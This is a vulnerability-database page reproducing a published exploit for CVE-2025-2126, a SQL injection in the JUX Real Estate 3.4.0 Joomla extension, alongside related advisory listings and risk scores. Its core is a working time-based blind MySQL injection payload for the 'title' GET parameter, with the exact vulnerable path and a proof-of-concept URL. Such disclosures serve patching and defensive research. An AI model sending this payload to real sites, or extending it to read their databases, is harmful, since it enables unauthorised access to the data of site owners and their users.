Vulners
Lucene search
JUX Real Estate 3.4.0 - SQL Injection
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2025-2126 | 9 Mar 202517:37 | – | circl |
 | JoomlaUX JUX Real Estate 注入漏洞 | 9 Mar 202500:00 | – | cnnvd |
 | CVE-2025-2126 | 9 Mar 202517:00 | – | cve |
 | CVE-2025-2126 JoomlaUX JUX Real Estate GET Parameter realties sql injection | 9 Mar 202517:00 | – | cvelist |
 | EUVD-2025-7511 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-2126 | 9 Mar 202517:15 | – | nvd |
 | JUX Real Estate 3.4.0 SQL Injection | 10 Mar 202500:00 | – | packetstorm |
 | CVE-2025-2126 | 12 Mar 202511:25 | – | redhatcve |
 | CVE-2025-2126 JoomlaUX JUX Real Estate GET Parameter realties sql injection | 9 Mar 202517:00 | – | vulnrichment |
# Exploit Title: JUX Real Estate 3.4.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 26/02/2025
# Vendor: JoomlaUX
# Vendor Homepage: https://joomlaux.com/
# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
# Demo Link: http://demo.joomlaux.com/#jux-real-estate
# Tested on: Windows 11 Pro
# Impact: Database Access
# CWE: CWE-89 - CWE-74 - CWE-707
# CVE: CVE-2025-2126
# VDB: VDB-299039
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /extensions/realestate/index.php/properties/list/list-with-sidebar/realties
GET Parameter 'title' is vulnerable to SQLi
---
Parameter: title (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: option=com_jux_real_estate&view=realties&Itemid=148&title='XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search
## POC:
https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=[SQLi]
## Payload:
1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
[-] DoneData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Mar 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.16.3 - 8.8
CVSS 45.3
CVSS 26.5
CVSS 36.3
EPSS0.01238
SSVC